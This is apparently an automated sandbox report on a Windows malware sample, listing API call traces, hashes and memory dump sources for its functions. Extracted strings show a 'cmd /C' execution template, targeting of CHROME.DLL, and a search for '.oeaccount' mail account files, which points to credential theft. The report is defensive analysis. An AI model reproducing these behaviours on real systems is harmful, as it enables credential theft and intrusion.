  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 66745

General

Root Process Name:d3d8sext.exe
Process MD5:FA37EB66B10EB030E777AF9420FFCE9A
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:66745
Initial sample SHA 256:856E8C8716FA5AFAC747EFCD8ACFE1488C703F1B8620DD567B2B7543458C5D69
Initial sample name:xxx.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
